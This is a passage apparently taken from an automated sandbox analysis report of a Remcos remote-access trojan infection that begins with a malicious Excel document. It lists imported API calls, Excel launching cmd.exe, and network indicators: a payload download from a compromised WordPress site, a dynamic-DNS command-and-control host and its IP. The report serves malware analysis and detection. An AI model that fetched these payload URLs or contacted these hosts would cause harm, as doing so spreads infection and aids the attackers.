2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                Software Vulnerabilities:

                barindex
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: global trafficDNS query: name: cutt.ly
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49169 -> 83.172.144.37:80
                Uses dynamic DNS servicesShow sources
                Source: unknownDNS query: name: blessings2021.ddns.net
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.244.30.19:2021
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/Shipppy.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.244.30.19 185.244.30.19
                Source: Joe Sandbox ViewIP Address: 104.22.1.232 104.22.1.232
                Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403473 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,recv,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: global trafficHTTP traffic detected: GET /wp-content/themes/index/Shipppy.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: cutt.ly
                Source: powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
                Source: powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: http://bighoreca.nl/wp-content/themes/index/Shipppy.exe
                Source: powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
                Source: powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
                Source: powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
                Source: powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
